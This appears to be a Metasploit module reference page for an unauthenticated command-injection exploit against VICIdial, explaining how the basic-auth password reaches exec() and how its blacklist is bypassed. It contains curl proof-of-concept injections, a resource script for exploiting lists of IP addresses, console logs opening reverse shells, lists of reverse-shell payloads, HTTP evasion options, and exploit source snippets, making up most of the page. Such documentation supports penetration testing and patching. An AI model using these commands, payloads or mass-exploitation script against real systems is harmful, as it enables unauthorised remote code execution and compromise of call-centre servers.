VICIdial user_authorization Unauthenticated Command Execution - Metasploit


This page contains detailed information about how to use the exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: VICIdial user_authorization Unauthenticated Command Execution
Module: exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec
Source code: modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb
Disclosure date: 2017-05-26
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module exploits a vulnerability in VICIdial versions 2.9 RC 1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default). When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to exec(). This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using vicidial_user_authorization_unauth_cmd_exec against a single host

Normally, you can use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec this way:

msf > use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > show targets
    ... a list of targets ...
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set TARGET target-id
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > show options
    ... show and set options ...
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > exploit

Using vicidial_user_authorization_unauth_cmd_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your vicidial_user_authorization_unauth_cmd_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module exploits a vulnerability in VICIdial versions 2.9 RC1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default).

When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to exec().

This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.

Vulnerable Application


VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well.

This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.

Installers:

Follow the instructions to enabled password encryption.

Technical Details


The functions.php file defines a function called user_authorization:

  function user_authorization($user,$pass,$user_option,$user_update)

This function is used throughout the application to validate user logon credentials supplied using HTTP basic authentication. If password encryption is enabled the user's password is passed to the pass argument of the bp.pl Perl script, without quotes, using PHP's exec() function:

  if ($SSpass_hash_enabled > 0)
          {
          if (file_exists("../agc/bp.pl"))
                  {$pass_hash = exec("../agc/bp.pl --pass=$pass");}
          else
                  {$pass_hash = exec("../../agc/bp.pl --pass=$pass");}

A rudimentary blacklist is used to prevent command injection. The apostrophe ', quote ", semi-colon ; and backslash \ characters are removed from the user's username and password using preg_replace, like so:

  $user = preg_replace("/\'|\"|\\\\|;/","",$user);
  $pass = preg_replace("/\'|\"|\\\\|;/","",$pass);

It is trivial to bypass the blacklist.

For example, backticks `, pipe | or ampersand & are sufficient to bypass the blacklist and execute arbitrary operating system commands.

For the purposes of exploitation, reaching the user_authorization function call with malicious input is hindered by additional input validation in use prior to the authentication check throughout the majority of the codebase:

  $PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_USER);
  $PHP_AUTH_PW = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_PW);

However, in VICIdial version 2.11RC2, at least two files did not make use of the additional validation:

  • help.php
  • vicidial_sales_viewer.php

In VICIdial version 2.13RC1, at least one file did not make use of the additional validation:

  • vicidial_sales_viewer.php

This vulnerability was patched in revision 2759.

Proof of Concept


  $ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" \
  --user 'anyusername:anypassword& id>/tmp/pwned_by_sales_viewer #'
  $ curl -isk "https://VICIdial.local/vicidial/help.php" \
  --user 'anyusername:anypassword& id>/tmp/pwned_by_help #'

Note that /tmp/pwned_by_help and /tmp/pwned_by_sales_viewer files should contain the results of the id command.

Verification Steps


  1. Start msfconsole
  2. Do: use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec
  3. Do: set rhost [IP]
  4. Do: run
  5. You should get a session

Scenarios


  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
  [*] 172.16.191.150:80 The target appears to be vulnerable.
  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run

  [*] Started reverse TCP handler on 172.16.191.181:4444 
  [*] 172.16.191.150:80 Sending payload (505 bytes)
  [+] 172.16.191.150:80 Payload sent successfully
  [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400

  id
  uid=48(apache) gid=48(apache) groups=48(apache)

Verbose

  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true
  verbose => true
  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check

  [*] 172.16.191.150:80 Password encryption is supported, but may not be enabled.
  [*] 172.16.191.150:80 The target appears to be vulnerable.
  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run

  [*] Started reverse TCP handler on 172.16.191.181:4444 
  [*] 172.16.191.150:80 Sending payload (505 bytes)
  [+] 172.16.191.150:80 Payload sent successfully
  [*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400

  id
  uid=48(apache) gid=48(apache) groups=48(apache)

Go back to menu.

Msfconsole Usage


Here is how the unix/webapp/vicidial_user_authorization_unauth_cmd_exec exploit module looks in the msfconsole:

msf6 > use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/webapp/vicidial_user_authorization_unauth_cmd_exec) > show info

       Name: VICIdial user_authorization Unauthenticated Command Execution
     Module: exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-05-26

Provided by:
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /vicidial/       yes       The base path to VICIdial
  VHOST                       no        HTTP server virtual host

Payload information:
  Space: 2048
  Avoid: 6 characters

Description:
  This module exploits a vulnerability in VICIdial versions 2.9 RC 1 
  to 2.13 RC1 which allows unauthenticated users to execute arbitrary 
  operating system commands as the web server user if password 
  encryption is enabled (disabled by default). When password 
  encryption is enabled the user's password supplied using HTTP basic 
  authentication is used in a call to exec(). This module has been 
  tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.

References:
  http://www.vicidial.org/VICIDIALmantis/view.php?id=1016

Module Options


This is a complete list of options available in the unix/webapp/vicidial_user_authorization_unauth_cmd_exec exploit:

msf6 exploit(unix/webapp/vicidial_user_authorization_unauth_cmd_exec) > show options

Module options (exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /vicidial/       yes       The base path to VICIdial
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Advanced Options


Here is a complete list of advanced options supported by the unix/webapp/vicidial_user_authorization_unauth_cmd_exec exploit:

msf6 exploit(unix/webapp/vicidial_user_authorization_unauth_cmd_exec) > show advanced

Module advanced options (exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/webapp/vicidial_user_authorization_unauth_cmd_exec module can exploit:

msf6 exploit(unix/webapp/vicidial_user_authorization_unauth_cmd_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/webapp/vicidial_user_authorization_unauth_cmd_exec exploit:

msf6 exploit(unix/webapp/vicidial_user_authorization_unauth_cmd_exec) > show payloads

Compatible Payloads
===================

   #   Name                                 Disclosure Date  Rank    Check  Description
   -   ----                                 ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_netcat                          normal  No     Unix Command Shell, Bind TCP (via netcat)
   1   payload/cmd/unix/bind_perl                            normal  No     Unix Command Shell, Bind TCP (via Perl)
   2   payload/cmd/unix/bind_perl_ipv6                       normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   3   payload/cmd/unix/generic                              normal  No     Unix Command, Generic Command Execution
   4   payload/cmd/unix/pingback_bind                        normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   5   payload/cmd/unix/pingback_reverse                     normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   6   payload/cmd/unix/reverse_netcat                       normal  No     Unix Command Shell, Reverse TCP (via netcat)
   7   payload/cmd/unix/reverse_perl                         normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   payload/cmd/unix/reverse_perl_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   payload/cmd/unix/reverse_python                       normal  No     Unix Command Shell, Reverse TCP (via Python)
   10  payload/cmd/unix/reverse_python_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via python)

Evasion Options


Here is the full list of possible evasion options supported by the unix/webapp/vicidial_user_authorization_unauth_cmd_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/webapp/vicidial_user_authorization_unauth_cmd_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

60:	    pass = "#{rand_text_alpha(rand(10) + 5)}&#"
61:	    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'),
62:	                           'authorization' => basic_auth(user, pass)
63:	
64:	    unless res
65:	      vprint_status 'Connection failed'
66:	      return CheckCode::Unknown
67:	    end
68:	
69:	    if res.code != 401
70:	      vprint_status "#{peer} Unexpected reply. Expected authentication failure."

<PEER> Password encryption is supported, but may not be enabled.


Here is a relevant code snippet related to the "<PEER> Password encryption is supported, but may not be enabled." error message:

79:	    end
80:	
81:	    # Check for ../agc/bp.pl password encryption script
82:	    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '..', 'agc', 'bp.pl')
83:	    if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/
84:	      vprint_status "#{peer} Password encryption is supported, but may not be enabled."
85:	      return CheckCode::Appears
86:	    end
87:	
88:	    vprint_status "#{peer} Could not verify whether password encryption is supported."
89:	    CheckCode::Detected

<PEER> Could not verify whether password encryption is supported.


Here is a relevant code snippet related to the "<PEER> Could not verify whether password encryption is supported." error message:

83:	    if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/
84:	      vprint_status "#{peer} Password encryption is supported, but may not be enabled."
85:	      return CheckCode::Appears
86:	    end
87:	
88:	    vprint_status "#{peer} Could not verify whether password encryption is supported."
89:	    CheckCode::Detected
90:	  end
91:	
92:	  def execute_command(cmd, opts = {})
93:	    user = rand_text_alpha(rand(10) + 5)

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

96:	    print_status "#{peer} Sending payload (#{cmd.length} bytes)"
97:	    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'),
98:	                           'authorization' => basic_auth(user, pass)
99:	
100:	    if !res
101:	      fail_with(Failure::Unreachable, 'Connection failed')
102:	    elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/
103:	      print_good "#{peer} Payload sent successfully"
104:	    else
105:	      fail_with(Failure::UnexpectedReply, 'Unexpected reply')
106:	    end

Unexpected reply


Here is a relevant code snippet related to the "Unexpected reply" error message:

100:	    if !res
101:	      fail_with(Failure::Unreachable, 'Connection failed')
102:	    elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/
103:	      print_good "#{peer} Payload sent successfully"
104:	    else
105:	      fail_with(Failure::UnexpectedReply, 'Unexpected reply')
106:	    end
107:	  end
108:	
109:	  def exploit
110:	    execute_command(payload.encoded)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


bcoles

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.